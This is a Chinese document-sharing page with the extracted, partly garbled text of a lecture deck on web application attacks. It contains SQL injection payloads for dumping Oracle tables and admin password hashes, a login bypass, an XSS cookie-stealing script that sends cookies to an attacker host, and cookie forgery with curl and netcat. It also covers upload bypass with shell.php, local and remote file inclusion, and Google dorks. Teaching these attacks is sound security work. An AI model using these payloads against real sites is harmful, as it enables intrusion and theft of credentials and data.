gggweb应用攻击技术PPT参考课件

上传人:汽*** 文档编号:569330824 上传时间:2024-07-28 格式:PPT 页数:70 大小:4.06MB
返回 下载 相关 举报
gggweb应用攻击技术PPT参考课件_第1页
第1页 / 共70页
gggweb应用攻击技术PPT参考课件_第2页
第2页 / 共70页
gggweb应用攻击技术PPT参考课件_第3页
第3页 / 共70页
gggweb应用攻击技术PPT参考课件_第4页
第4页 / 共70页
gggweb应用攻击技术PPT参考课件_第5页
第5页 / 共70页
点击查看更多>>
资源描述

《gggweb应用攻击技术PPT参考课件》由会员分享,可在线阅读,更多相关《gggweb应用攻击技术PPT参考课件(70页珍藏版)》请在金锄头文库上搜索。

1、WEBWEB应用攻击技术应用攻击技术目录目录十大WEB应用安全漏洞SQL注入XSS跨站表单绕过Cookies欺骗信息泄露GoogleHacking访问控制错误PHP特有漏洞攻击变量滥用文件包含上传漏洞攻击网页篡改、挂马其他SQL注入(SQL injection)跨站脚本攻击恶意代码已知弱点和错误配置隐藏字段后门和调试漏洞参数篡改更改cookie输入信息控制缓冲区溢出十大常见的十大常见的WEBWEB应用攻击应用攻击SQLSQL注入注入技术技术概述概述就攻击技术本质而言,它利用的工具是SQL的语法,针对的是应用程序开发者编程中的漏洞,当攻击者能操作数据,向应用程序中插入一些SQL语句时,SQL I

2、njection攻击就发生了。实际上,SQL Injection攻击是存在于常见的多连接的应用程序中的一种漏洞,攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的任意查询,篡改和命令执行。 就风险而言,SQL Injection攻击也是位居前列,和缓冲区溢出漏洞相比,其优势在于能够轻易的绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所有的漏洞。安全安全风险风险攻击特点攻击特点攻击的广泛性:由于其利用的是SQL语法,使得攻击普遍存在;攻击代码的多样性:由于各

3、种数据库软件及应用程序有其自身的特点,实际的攻击代码可能不尽相同;影响范围影响范围数据库:MS-Sql Server、Oracle、Mysql、DB2、Informix等所有基于SQL语言标准的数据库软件;应用程序:ASP、PHP,JSP、CGI、CFM等所有应用程序;简单的SQL Injection攻击(1)假设的登录查询 SELECT * FROM users WHERE login = victorAND password = 123假设的ASP代码var sql = SELECT * FROM usersWHERE login = + formusr + AND password =

4、+ formpwd + ;简单的SQL Injection攻击(2)输入字符formusr = or 1=1 formpwd = anything实际的查询代码SELECT * FROM usersWHERE username = or 1=1 AND password = anything -是结束符,后面变成注释,导致此SQL语句恒成立,可以登陆后台SQLSQL注入攻击过程演示注入攻击过程演示(1)(1)手动注入手动注入发现注入点发现注入点发现产品展示的URL链接,提交单引号立即报错用经典的and 1=1测试返回正常,用and 1=2返回不正常, 存在注入漏洞用经典的and 1=1测试返回

5、正常,用and 1=2返回不正常, 存在注入漏洞Select * from user where id=123String id =request.getParameter(“id”);String sql = SELECT * FROM user WHERE id = + id; 判断数据库类型根据入侵经验该系统的后台可能为ORACLE数据库Dual这个表是ORACLE数据库特有的, 看下它是否存在,如果存在就说明数据库为ORACLE。提交:And 0(select count(*) from dual),返回正常页面字段猜解猜解字段数量并构造查询语句And%201=1%20union%20

6、select%20null,null,null,null,null,null,null,null,null,null from dual页面返回正常,查询语句语法正确检测字段类型and%201=1%20union%20select%20null,null,null,null,null,null,null,null,null,null%20from%20dual在第3 ,4,7,8,9,10位置加上 单引号均返回正常页面,字段是字符型查询ORACLE数据库的版本and%20%201=2%20union%20select%20null,null,(select%20banner%20from%20

7、sys.v_$version%20where%20rownum=1),null,null,null,null,null,null,null%20from%20dual-查询当前连接用户and%20%201=2%20union%20select%20null,null,(select%20SYS_CONTEXT%20(USERENV,%20CURRENT_USER)%20from%20dual),null,null,null,null,null,null,null%20from%20dual-爆出当前连接用户为TOUR查询数据库中所有表名and%20%201=2%20union%20select

8、%20null,null,TABLE_NAME,null,null,null,null,null,null,null%20from%20USER_TABLES-成功获取表名其中敏感表名包括ADMIN ABOUT CONFIG MASTER查询字段and%20%201=2%20union%20select%20null,null,name,null,null,null,null,null,null,null%20from%20master-获取ADMIN中的用户名and%20%201=2%20union%20select%20null,null,password,null,null,null,n

9、ull,null,null,null%20from%20master-获取ADMIN中的管理密码,MD5加密查找后台登陆地址使用得到的密码成功登陆SQLSQL注入攻击过程演示注入攻击过程演示(2)(2)cookiecookie注入注入发现注入点发现产品展示的详细信息的URL链接,在cookie里提交单引号立即报错在cookie里用%20AnD%208808%3D8808;测试返回正常,用%20AnD%208808%3D8807;返回不正常, 存在注入漏洞由于是盲注点,所以选择用工具进行检测Webscan加入当前http:/192.168.148.128/09-90dbapp/products.

10、asp?id=1339进行自动检测跨站脚本攻击跨站脚本攻击80%网站存在跨站漏洞, 包括许多大型知名网站什么是跨站脚本攻击跨站攻击的危害跨站漏洞的检测与攻击手段 跨站脚本漏洞产生原理由于WEB应用程序没有对用户的输入和输出进行严格的过滤和转换,就导致在返回页面中可能嵌入恶意代码。什么是跨站脚本攻击XSS又叫CSS(Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往WEB页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。跨站脚本执行漏洞的攻击效果需要借助第三方网站来显现,因此这种攻击能在一定程度上隐藏身份

11、。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。跨站脚本攻击传播途径EMAILIM聊天室留言板论坛 交互性平台编写Cookie收集脚本cookie.asp% % windows.location(http:/windows.location(http:/);/script); 生成恶意URL诱骗用户点击CookieCookie收集脚本运行在收集脚本运行在cookie.aspcookie.asphttp:/target/http:/target/index.asp?inputindex.asp?input=document.locatiodocument.locatio

12、n n=http:/control/=http:/control/cookie.asp?+document.cookiecookie.asp?+document.cookie/script 国外收集国外收集xssxss的站的站利用跨站获取COOKIE跨站漏洞演示跨站攻击的危害窃取 Cookie 劫持帐户 执行 ActiveX 执行 Flash 内容 强迫您下载软件对硬盘和数据采取操作 XSS挂马SNS和Web2.0网站的发展,让交互性更的更强。SQL注入减少,XSS将慢慢抬头,利用方式也变多。表单绕过漏洞表单绕过漏洞漏洞介绍在登陆表单可以使用一些特殊字符绕过对合法用户的认证体系,并且拥有合法用

13、户的权限漏洞成因对用户输入的字符未做安全性检测,它属于特殊的SQL注入。问题代码(ASP+ORACLE)username=Request(username)userpassword=md5(replace(trim(request(userpassword),) set set rsrs= =server.CreateObject(adodb.recordsetserver.CreateObject(adodb.recordset) ) sqlsql=select * from =select * from userbuserb where username=&username& where

14、username=&username& and and userpassworduserpassword=&=&userpassworduserpassword& & rs.Openrs.Open sqlsql ,conn,3,3 ,conn,3,3存在SQL注入之表单绕过的URLhttp:/192.168.148.128/09-90dbapp/userinfo/user_checklogin.asp?username=admin%27-&userpassword=1111&imageField=%B5%C7+%C2%BD只要在登陆页面/userinfo/login.asp中。将用户名输入:A

15、dmin-;密码输入:任何字符点击登陆,并提交,即可拥有管理员权限存在SQL注入之表单绕过的URLCookieCookie欺骗漏洞欺骗漏洞漏洞介绍利用工具修改客户端的Cookie欺骗服务器端的WEB程序漏洞成因WEB程序使用明文CookieWEB程序仅仅使用Cookie进行身份验证文件型Cookie欺骗保存在硬盘上会话型Cookie欺骗保存在内存中文件型文件型CookieCookie欺骗攻击欺骗攻击修改硬盘上保存的Cookie使用使用IECookieViewIECookieView修改修改直接发送Cookie直接使用直接使用curlcurl发送发送CookieCookiecurl http:/

16、target/index.php -b admin=1 -d curl http:/target/index.php -b admin=1 -d other_action=todoother_action=todo会话型会话型CookieCookie欺骗攻击欺骗攻击获取HTTP响应头,伪造Cookie使用使用使用使用NetCatNetCatNetCatNetCat连接目标,获取连接目标,获取连接目标,获取连接目标,获取HTTPHTTPHTTPHTTP响应头,修改响应头,修改响应头,修改响应头,修改CookieCookieCookieCookie字段字段字段字段虚假代理,发送Cookie使用使用

17、使用使用NetCatNetCatNetCatNetCat监听端口,发送监听端口,发送监听端口,发送监听端口,发送CookieCookieCookieCookie到浏览器,到浏览器,到浏览器,到浏览器,NC vv l NC vv l NC vv l NC vv l p 9090Cookie.txtp 9090Cookie.txtp 9090Cookie.txtp 9090Cookie.txt设置浏览器代理为设置浏览器代理为设置浏览器代理为设置浏览器代理为127.0.0.1:9090127.0.0.1:9090127.0.0.1:9090127.0.0.1:9090,访问目标,访问目标,访问目标,

18、访问目标获取HTTP响应头,增加cookies信息将请求参数改成将请求参数改成将请求参数改成将请求参数改成CookieCookieCookieCookie字段,进行字段,进行字段,进行字段,进行SQLSQLSQLSQL注入。注入。注入。注入。Cookie欺骗典型实例小秋个性留言本管理验证漏洞 修改cookie值loginok为任意值,即可成功管理员信息泄漏漏洞信息泄漏漏洞漏洞介绍提交特殊的错误参数,WEB服务器返回特定的详细的敏感信息漏洞成因WEB程序对错误处理不严WEB服务器配置不当WEB开发和管理不当WEBWEB应用威胁应用威胁信息泄漏攻击信息泄漏攻击(1)(1)泄漏物理路径请求不存在文件

19、猜解正确用户名输入错误用户名时,返回“该用户不存在”暴露数据库路径请求http:/192.168.148.128/09-90dbapp/product.asp?tp=67暴露oracle数据库信息WEBWEB应用威胁应用威胁信息泄漏攻击信息泄漏攻击(2)(2)数据库连接的备份文件db.inc.bakGlobal.asa.bakConfig.asp.bakConn.asp.bak代码备份文件.asp.bak.asp.1www.rarWeb.tar.gzbackup.sqlweb.config.bak常用目录名和文件名/admin/backup/manage/admin.asplogin.phpA

20、dmin_login.jspGoogleHackingGoogleHacking什么是GoogleHackingGoogle Hacking是一种利用搜索引擎获取web应用程序弱点和敏感信息的手段。Google Hacking 是一种以合法的方式获取非法或未授权信息的手段Google Hacking 是所有利用搜索引擎进行攻击的一个典型基本搜索+ 把google可能忽略的字列如查询范围 - 把某个字忽略 同意词. 单一的通配符* 通配符,可代表多个字母精确查询高级搜索intext 把网页中的正文内容中的某个字符做为搜索条件 intitle 搜索网页标题中某个字符做为搜索条件 cache 搜索g

21、oogle里关于某些内容的缓存iletype 搜索指定类型的文件(重要参数)inurl 搜索我们指定的字符是否存在于URL中site 搜索指定的网站或者域名GoogleHacking实例. .cncn filetype:incfiletype:inc filetype:mdbfiletype:mdb inurl:databaseinurl:databasefiletype:mdbfiletype:mdb Standard Jet DB“ Standard Jet DB“ 该站已经被入侵,HYTOP.MDB 是个木马打包源代码后的生成文件访问控制错误漏洞访问控制错误漏洞漏洞介绍敏感目录或者敏感文

22、件权限设置不当导致被攻击者查看漏洞成因WEB程序权限设置不严格WEB程序服务器权限设置不当WEBWEB应用威胁应用威胁访问控制错误攻击访问控制错误攻击上传程序无密码保护http:/target/upfile.aspupfile.asphttp:/target/upfile.aspupfile.asp直接可以浏览目录http:/target/admin/http:/target/admin/下载模块下载敏感信息http:/target/down.jsp?file=c:winntrepairsamhttp:/target/down.jsp?file=c:winntrepairsam后台管理无密码保

23、护且易猜测后台管理地址http:/target/adminhttp:/target/adminhttp:/target/adminhttp:/target/adminhttp:/target/managehttp:/target/managehttp:/target/managehttp:/target/managePHPPHP特有漏洞攻击特有漏洞攻击变量滥用攻击标量没有初始化远程文件包含漏洞没有检验文件是否为本地文件变量滥用攻击变量滥用攻击问题代码 自定义变量绕过验证提交http:/victim/test_1.php?auth=1远程文件包含漏洞远程文件包含漏洞问题代码?请求敏感文件请求ht

24、tp:/target/test_2.php?filename=/etc/passwd远程执行命令生成远程文件attack.txt,运行为http:/hacker/attack.txt,内容为请求http:/target/test_2.php?filename=http:/attack/attack.txt问题代码?请求敏感文件请求请求http:/target/test_2.php?filename=/etc/passwdhttp:/target/test_2.php?filename=/etc/passwd远程执行命令生成远程文件生成远程文件attack.txt,attack.txt,运行为运

25、行为http:/hacker/attack.txthttp:/hacker/attack.txt,内容为,内容为请求请求http:/target/test_2.php?filename=http:/attack/attachttp:/target/test_2.php?filename=http:/attack/attack.txtk.txt第三方第三方WEBWEB程序漏洞程序漏洞漏洞介绍网站使用了第三方web程序,且含有可被利用攻击的漏洞漏洞成因第三方WEB自身安全性第三方WEB程序来源的安全性WEB开发和管理不当安恒机密. | 60编辑器最大的隐患(ewebeditor,fckeditor

26、)交互平台BBSBLOG管理后台phpMyAdminTomcat/WebLogic上传欺骗漏洞上传欺骗漏洞漏洞介绍利用上传信息,绕过上传文件安全控制漏洞成因对上传文件无安全过滤对上传文件安全控制不严上传欺骗漏洞上传欺骗漏洞常见绕过仅本地javascript安全控制检测文件格式类型var var fileext=document.form1.UpFile.value.substring(docfileext=document.form1.UpFile.value.substring(document.form1.UpFile.value.lastIndexOf(.),documenument.f

27、orm1.UpFile.value.lastIndexOf(.),document.form1.UpFile.value.length)t.form1.UpFile.value.length)fileext=fileext.toLowerCase()fileext=fileext.toLowerCase() if (fileext!=.jpg) & (fileext!=.gif) & if (fileext!=.jpg) & (fileext!=.gif) & (fileext!=.jpeg) & (fileext!=.png) & (fileext!=.jpeg) & (fileext!=.

28、png) & (fileext!=.bmp)(fileext!=.bmp) alert( alert(对不起,系统仅支持标准格式的照片,对不起,系统仅支持标准格式的照片,请您调整格式后重新上传,谢谢请您调整格式后重新上传,谢谢 !);); document.form1.UpFile.focus(); document.form1.UpFile.focus(); WEBWEB应用威胁应用威胁上传欺骗漏洞上传欺骗漏洞其他绕过Content-type判断绕过?php?phpif($_FILESuserfiletype != image/gif) if($_FILESuserfiletype != i

29、mage/gif) echo Sorry, we only allow uploading GIF echo Sorry, we only allow uploading GIF images;images; exit; exit; Content-Disposition: form-data; name=userfile; Content-Disposition: form-data; name=userfile; filename=shell.phpfilename=shell.phpContent-Type: Content-Type: image/gifimage/gif?php?空字

30、节绕过网页篡改网页篡改/ /挂马技术挂马技术静态页面篡改数据库篡改-动态页面篡改ARP欺骗动态改变外出网页内容静态页面篡改直接修改网站页面文件(静态页面及动态脚本)直接修改网站页面文件(静态页面及动态脚本)直接修改图片等内容文件直接修改图片等内容文件挂接相关木马,直接控制挂接相关木马,直接控制WebWeb服务器。服务器。嵌入相关恶意代码,感染至访问者机器,构筑僵嵌入相关恶意代码,感染至访问者机器,构筑僵尸网络尸网络SQLSQL注入篡改注入篡改/ /挂马挂马ARPARP欺骗网页挂马欺骗网页挂马其他漏洞其他漏洞系统漏洞漏洞扫描及补丁现状网络策略SNMP泄漏、ACL、口令策略等错误配置错误配置信息测试文件测试文件后门 素材和资料部分来自素材和资料部分来自网络,如有帮助请下载网络,如有帮助请下载!702021/3/10

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 办公文档 > 工作计划

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号